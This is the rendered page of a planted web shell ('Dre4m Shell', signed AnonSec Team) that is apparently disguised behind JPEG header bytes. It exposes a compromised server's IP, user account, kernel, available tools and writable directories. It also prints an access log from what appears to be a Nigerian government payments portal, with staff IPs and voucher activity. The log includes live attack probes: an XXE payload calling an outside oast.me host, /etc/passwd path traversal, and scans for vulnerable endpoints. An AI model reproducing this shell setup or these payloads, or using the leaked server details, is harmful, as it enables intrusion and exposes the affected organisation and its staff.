ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 52.15.37.115
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/access-logs/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/access-logs/funds.nicn.gov.ng-ssl_log
197.210.77.115 - - [16/Oct/2024:05:07:13 -0700] "POST /remove-voucher-from-schedule-JSON HTTP/1.1" 200 44 "https://funds.nicn.gov.ng/view-epayment-added" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
197.210.77.115 - - [16/Oct/2024:05:07:17 -0700] "GET /view-epayment-added HTTP/1.1" 200 46677 "https://funds.nicn.gov.ng/view-epayment-added" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
197.210.77.115 - - [16/Oct/2024:05:07:27 -0700] "GET /view-all-staff-attached-to-a-voucher/29592 HTTP/1.1" 200 925169 "https://funds.nicn.gov.ng/view-epayment-added" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
197.210.77.115 - - [16/Oct/2024:05:08:53 -0700] "GET /login HTTP/1.1" 200 5318 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0"
102.91.93.196 - - [16/Oct/2024:05:09:24 -0700] "GET /accept-voucher-for-process HTTP/1.1" 302 368 "https://funds.nicn.gov.ng/voucher/liability" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
102.91.93.196 - - [16/Oct/2024:05:09:24 -0700] "GET /login HTTP/1.1" 200 5318 "https://funds.nicn.gov.ng/voucher/liability" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
102.91.93.196 - - [16/Oct/2024:05:09:25 -0700] "GET /assets/css/_all-skins.min.css HTTP/1.1" 200 42005 "https://funds.nicn.gov.ng/login" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
102.91.93.196 - - [16/Oct/2024:05:09:25 -0700] "GET /assets/font-awesome/css/font-awesome.min.css HTTP/1.1" 200 21984 "https://funds.nicn.gov.ng/login" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
102.91.93.196 - - [16/Oct/2024:05:09:26 -0700] "GET /favicon.ico HTTP/1.1" 200 - "https://funds.nicn.gov.ng/login" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
197.210.77.115 - - [16/Oct/2024:05:09:29 -0700] "POST /login HTTP/1.1" 302 344 "https://funds.nicn.gov.ng/login" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0"
197.210.77.115 - - [16/Oct/2024:05:09:30 -0700] "GET / HTTP/1.1" 200 12547 "https://funds.nicn.gov.ng/login" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0"
102.91.93.196 - - [16/Oct/2024:05:09:49 -0700] "POST /login HTTP/1.1" 302 452 "https://funds.nicn.gov.ng/login" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
102.91.93.196 - - [16/Oct/2024:05:09:49 -0700] "GET /accept-voucher-for-process HTTP/1.1" 200 108089 "https://funds.nicn.gov.ng/login" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
197.210.77.115 - - [16/Oct/2024:05:09:56 -0700] "GET /generate-epayment-report HTTP/1.1" 200 60694 "https://funds.nicn.gov.ng/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0"
102.91.93.196 - - [16/Oct/2024:05:10:09 -0700] "POST /accept-voucher-for-process HTTP/1.1" 200 38867 "https://funds.nicn.gov.ng/accept-voucher-for-process" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
102.91.93.196 - - [16/Oct/2024:05:10:15 -0700] "GET /accept-or-approve-voucher/29763 HTTP/1.1" 302 452 "https://funds.nicn.gov.ng/accept-voucher-for-process" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
102.91.93.196 - - [16/Oct/2024:05:10:15 -0700] "GET /accept-voucher-for-process HTTP/1.1" 200 108558 "https://funds.nicn.gov.ng/accept-voucher-for-process" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
197.210.77.115 - - [16/Oct/2024:05:10:28 -0700] "POST /search-for-committed-voucher HTTP/1.1" 302 444 "https://funds.nicn.gov.ng/generate-epayment-report" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0"
197.210.77.115 - - [16/Oct/2024:05:10:29 -0700] "GET /generate-epayment-report HTTP/1.1" 200 27131 "https://funds.nicn.gov.ng/generate-epayment-report" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0"
197.210.77.115 - - [16/Oct/2024:05:10:38 -0700] "POST /update-voucher-for-epayment-staff-JSON HTTP/1.1" 200 39 "https://funds.nicn.gov.ng/view-all-staff-attached-to-a-voucher/29592" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
197.210.77.115 - - [16/Oct/2024:05:10:40 -0700] "GET /view-all-staff-attached-to-a-voucher/29592 HTTP/1.1" 200 925187 "https://funds.nicn.gov.ng/view-all-staff-attached-to-a-voucher/29592" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
102.91.93.196 - - [16/Oct/2024:05:10:26 -0700] "GET /voucher/liability HTTP/1.1" 200 931886 "https://funds.nicn.gov.ng/accept-voucher-for-process" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
197.210.77.115 - - [16/Oct/2024:05:11:03 -0700] "POST /search-for-committed-voucher HTTP/1.1" 302 444 "https://funds.nicn.gov.ng/generate-epayment-report" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0"
197.210.77.115 - - [16/Oct/2024:05:11:03 -0700] "GET /generate-epayment-report HTTP/1.1" 200 27274 "https://funds.nicn.gov.ng/generate-epayment-report" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0"
197.210.77.115 - - [16/Oct/2024:05:11:10 -0700] "POST /update-voucher-for-epayment-staff-JSON HTTP/1.1" 200 39 "https://funds.nicn.gov.ng/view-all-staff-attached-to-a-voucher/29592" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
197.210.77.115 - - [16/Oct/2024:05:11:12 -0700] "GET /view-all-staff-attached-to-a-voucher/29592 HTTP/1.1" 200 925193 "https://funds.nicn.gov.ng/view-all-staff-attached-to-a-voucher/29592" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
102.91.93.196 - - [16/Oct/2024:05:11:04 -0700] "POST /voucher/liability HTTP/1.1" 200 929633 "https://funds.nicn.gov.ng/voucher/liability" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
197.210.77.115 - - [16/Oct/2024:05:11:35 -0700] "POST /search-for-committed-voucher HTTP/1.1" 302 444 "https://funds.nicn.gov.ng/generate-epayment-report" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0"
197.210.77.115 - - [16/Oct/2024:05:11:35 -0700] "GET /generate-epayment-report HTTP/1.1" 200 27181 "https://funds.nicn.gov.ng/generate-epayment-report" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0"
142.250.32.6 - - [16/Oct/2024:05:12:00 -0700] "GET /.well-known/traffic-advice HTTP/1.1" 404 4180 "-" "Chrome Privacy Preserving Prefetch Proxy"
72.14.201.119 - - [16/Oct/2024:05:12:01 -0700] "GET / HTTP/1.1" 302 368 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
72.14.201.119 - - [16/Oct/2024:05:12:01 -0700] "GET /login HTTP/1.1" 200 5318 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
197.210.77.115 - - [16/Oct/2024:05:12:02 -0700] "POST /search-for-committed-voucher HTTP/1.1" 302 444 "https://funds.nicn.gov.ng/generate-epayment-report" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0"
197.210.77.115 - - [16/Oct/2024:05:12:02 -0700] "GET /generate-epayment-report HTTP/1.1" 200 27281 "https://funds.nicn.gov.ng/generate-epayment-report" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0"
197.210.77.115 - - [16/Oct/2024:05:12:10 -0700] "GET / HTTP/1.1" 302 368 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
197.210.77.115 - - [16/Oct/2024:05:12:18 -0700] "POST /update-voucher-for-epayment-staff-JSON HTTP/1.1" 200 39 "https://funds.nicn.gov.ng/view-all-staff-attached-to-a-voucher/29592" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
197.210.77.115 - - [16/Oct/2024:05:12:21 -0700] "POST /get-voucher-sum-amount-via-json HTTP/1.1" 200 9 "https://funds.nicn.gov.ng/generate-epayment-report" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0"
197.210.77.115 - - [16/Oct/2024:05:12:21 -0700] "GET /login HTTP/1.1" 200 5318 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
197.210.77.115 - - [16/Oct/2024:05:12:21 -0700] "POST /get-voucher-details-via-json HTTP/1.1" 200 407 "https://funds.nicn.gov.ng/generate-epayment-report" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0"
197.210.77.115 - - [16/Oct/2024:05:12:22 -0700] "POST /add-committed-voucher-to-list HTTP/1.1" 302 444 "https://funds.nicn.gov.ng/generate-epayment-report" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0"
197.210.77.115 - - [16/Oct/2024:05:12:20 -0700] "GET /view-all-staff-attached-to-a-voucher/29592 HTTP/1.1" 200 925195 "https://funds.nicn.gov.ng/view-all-staff-attached-to-a-voucher/29592" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
197.210.77.115 - - [16/Oct/2024:05:12:25 -0700] "GET /view-epayment-added HTTP/1.1" 200 73038 "https://funds.nicn.gov.ng/generate-epayment-report" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0"
197.210.77.115 - - [16/Oct/2024:05:12:23 -0700] "GET /generate-epayment-report HTTP/1.1" 200 61090 "https://funds.nicn.gov.ng/generate-epayment-report" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0"
197.210.77.115 - - [16/Oct/2024:05:12:48 -0700] "POST /login HTTP/1.1" 302 344 "https://funds.nicn.gov.ng/login" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
197.210.77.115 - - [16/Oct/2024:05:12:49 -0700] "GET / HTTP/1.1" 200 12556 "https://funds.nicn.gov.ng/login" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
197.210.77.115 - - [16/Oct/2024:05:12:49 -0700] "POST /update-voucher-for-epayment-staff-JSON HTTP/1.1" 200 39 "https://funds.nicn.gov.ng/view-all-staff-attached-to-a-voucher/29592" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
197.210.77.115 - - [16/Oct/2024:05:12:51 -0700] "GET /view-all-staff-attached-to-a-voucher/29592 HTTP/1.1" 200 925205 "https://funds.nicn.gov.ng/view-all-staff-attached-to-a-voucher/29592" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
197.210.77.115 - - [16/Oct/2024:05:12:57 -0700] "GET /view-all-staff-attached-to-a-voucher/29603 HTTP/1.1" 200 996410 "https://funds.nicn.gov.ng/view-epayment-added" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0"
197.210.77.115 - - [16/Oct/2024:05:13:25 -0700] "GET /all/e-payment/archive HTTP/1.1" 200 133967 "https://funds.nicn.gov.ng/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
197.210.77.115 - - [16/Oct/2024:05:14:30 -0700] "POST /update-voucher-for-epayment-staff-JSON HTTP/1.1" 200 39 "https://funds.nicn.gov.ng/view-all-staff-attached-to-a-voucher/29592" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
197.210.77.115 - - [16/Oct/2024:05:14:31 -0700] "GET /view-all-staff-attached-to-a-voucher/29592 HTTP/1.1" 200 925239 "https://funds.nicn.gov.ng/view-all-staff-attached-to-a-voucher/29592" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
40.77.167.9 - - [16/Oct/2024:05:14:41 -0700] "GET / HTTP/1.1" 302 368 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.9 - - [16/Oct/2024:05:14:47 -0700] "GET /login HTTP/1.1" 200 5318 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
197.210.77.115 - - [16/Oct/2024:05:15:56 -0700] "POST /update-voucher-for-epayment-staff-JSON HTTP/1.1" 200 39 "https://funds.nicn.gov.ng/view-all-staff-attached-to-a-voucher/29592" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
197.210.77.115 - - [16/Oct/2024:05:15:57 -0700] "GET /view-all-staff-attached-to-a-voucher/29592 HTTP/1.1" 200 925287 "https://funds.nicn.gov.ng/view-all-staff-attached-to-a-voucher/29592" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
197.210.77.115 - - [16/Oct/2024:05:16:41 -0700] "GET /all/e-payment/archive?page=3 HTTP/1.1" 200 134022 "https://funds.nicn.gov.ng/all/e-payment/archive" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
197.210.77.115 - - [16/Oct/2024:05:17:12 -0700] "GET /all/e-payment/archive?page=5 HTTP/1.1" 200 134086 "https://funds.nicn.gov.ng/all/e-payment/archive?page=3" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
197.210.77.115 - - [16/Oct/2024:05:17:47 -0700] "POST /update-voucher-for-epayment-staff-JSON HTTP/1.1" 200 39 "https://funds.nicn.gov.ng/view-all-staff-attached-to-a-voucher/29592" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
197.210.77.115 - - [16/Oct/2024:05:17:49 -0700] "GET /view-all-staff-attached-to-a-voucher/29592 HTTP/1.1" 200 925319 "https://funds.nicn.gov.ng/view-all-staff-attached-to-a-voucher/29592" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
197.210.77.115 - - [16/Oct/2024:05:19:10 -0700] "POST /update-voucher-for-epayment-staff-JSON HTTP/1.1" 200 39 "https://funds.nicn.gov.ng/view-all-staff-attached-to-a-voucher/29592" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
197.210.77.115 - - [16/Oct/2024:05:19:04 -0700] "GET /generate-epayment-report HTTP/1.1" 200 60673 "https://funds.nicn.gov.ng/all/e-payment/archive?page=5" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
197.210.77.115 - - [16/Oct/2024:05:19:14 -0700] "GET /view-all-staff-attached-to-a-voucher/29592 HTTP/1.1" 200 925351 "https://funds.nicn.gov.ng/view-all-staff-attached-to-a-voucher/29592" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
197.210.77.115 - - [16/Oct/2024:05:19:27 -0700] "POST /search-for-committed-voucher HTTP/1.1" 302 444 "https://funds.nicn.gov.ng/generate-epayment-report" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
197.210.77.115 - - [16/Oct/2024:05:19:27 -0700] "GET /generate-epayment-report HTTP/1.1" 200 27321 "https://funds.nicn.gov.ng/generate-epayment-report" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
197.210.77.115 - - [16/Oct/2024:05:19:41 -0700] "GET /display/voucher/27861 HTTP/1.1" 200 127671 "https://funds.nicn.gov.ng/generate-epayment-report" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
45.207.211.133 - - [16/Oct/2024:05:21:14 -0700] "GET /2nT3eqMUnMlVTbPH5Lv9EfYsQYO/../../ThinVnc.ini HTTP/1.1" 404 4180 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:70.0) Gecko/20100101 Firefox/70.0"
45.207.211.133 - - [16/Oct/2024:05:21:23 -0700] "POST /xmlpserver/ReportTemplateService.xls HTTP/1.1" 404 4180 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0"
45.207.211.133 - - [16/Oct/2024:05:21:24 -0700] "POST /rest/tinymce/1/macro/preview HTTP/1.1" 404 4180 "funds.nicn.gov.ng" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0"
45.207.211.133 - - [16/Oct/2024:05:21:24 -0700] "POST /cgi-bin/file_transfer.cgi HTTP/1.1" 404 4180 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
45.207.211.133 - - [16/Oct/2024:05:21:24 -0700] "GET /xmlpserver/convert?xml=<%3fxml+version%3d\"1.0\"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+\"http%3a//cs732uqldbsgkn5irrqg6ah5fiy833ubo.oast.me/xxe.xml\">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1" 404 4180 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/616.24 (KHTML, like Gecko) Version/17.2 Safari/616.24"
45.207.211.133 - - [16/Oct/2024:05:21:24 -0700] "POST /admin/auth/reset-password HTTP/1.1" 404 4180 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0"
45.207.211.133 - - [16/Oct/2024:05:21:24 -0700] "GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1" 404 4180 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
45.207.211.133 - - [16/Oct/2024:05:21:24 -0700] "POST /boafrm/formSysCmd HTTP/1.1" 404 4180 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36"
45.207.211.133 - - [16/Oct/2024:05:21:24 -0700] "POST /dashboard/uploadID.php HTTP/1.1" 404 4180 "-" "Mozilla/5.0 (SS; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0"
45.207.211.133 - - [16/Oct/2024:05:21:24 -0700] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 4180 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.26"
197.210.77.115 - - [16/Oct/2024:05:21:28 -0700] "POST /update-voucher-for-epayment-staff-JSON HTTP/1.1" 200 39 "https://funds.nicn.gov.ng/view-all-staff-attached-to-a-voucher/29592" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"

Anon7 - 2022
AnonSec Team